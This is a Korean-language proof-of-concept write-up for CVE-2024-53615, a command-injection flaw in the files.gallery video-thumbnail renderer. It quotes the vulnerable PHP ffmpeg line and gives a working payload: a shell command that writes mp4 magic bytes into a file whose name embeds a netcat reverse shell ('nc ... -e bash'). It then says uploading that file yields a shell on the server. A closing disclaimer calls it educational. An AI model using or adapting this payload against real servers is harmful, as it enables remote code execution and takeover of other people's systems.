
CVE-2024-53615
Karl Ward의 files.gallery v0.3.0 ~ 0.11.0에서 비디오 썸네일 렌더링 구성요소에 존재하는 명령 주입 취약점으로, 원격 공격자가 조작된 비디오 파일을 통해 임의 코드를 실행할 수 있습니다.
전제 조건:
PATH에 ffmpeg가 있어야 함config.php: 'allow_upload' => trueexec가 활성화되어 있어야 함취약점은 버전 0.9.12에서 가져온 다음 라인(비디오 미리보기를 생성하는 부분)에 있습니다:
$cmd = $ffmpeg_path . ' -ss 3 -t 1 -hide_banner -i "' . str_replace('"', '\"', $this->path) . '" -frames:v 1 -an -vf "thumbnail,scale=480:320:force_original_aspect_ratio=increase,crop=480:320" -r 1 -y -f mjpeg "' . $cache . '" 2>&1';
$this->path가 사용자에 의해 제어 가능하므로, 파일명에 bash 명령어 치환을 포함한 악성 파일을 구성할 수 있습니다. 이 파일은 반드시 mp4 매직 바이트를 포함하고, 파일명이 .mp4로 끝나야 합니다:
$ echo "AAAAIGZ0eXBpc29tAAACAGlzb21pc28yYXZjMW1wNDEAAQv7bW9vdgAAAGxtdmhk" | base64 -d > '$(nc 127.0.0.1 8443 -e bash).mp4'
이 파일을 업로드하고 페이지를 새로고침하여 애플리케이션이 파일을 로드하도록 하면, 로컬 머신에서 셸을 획득할 수 있습니다.
참고: 명령어는 파일명에 저장되므로, 이름 길이 제약으로 인해 리버스 셸 가능성이 제한됩니다.
이 저장소는 교육 및 연구 목적으로만 제공됩니다.
오용 경고: 이 도구를 무단 또는 악의적인 활동에 사용하는 것은 엄격히 금지되며, 지역, 주 또는 국제 법률을 위반할 수 있습니다. 저자는 이 코드의 오용에 대해 책임을 지지 않습니다.
이 도구를 어떤 환경에 배포하기 전에 항상 적절한 승인을 받으십시오. 이 프로젝트를 사용함으로써 귀하는 이를 책임감 있고 윤리적으로 사용하는 데 동의하는 것입니다.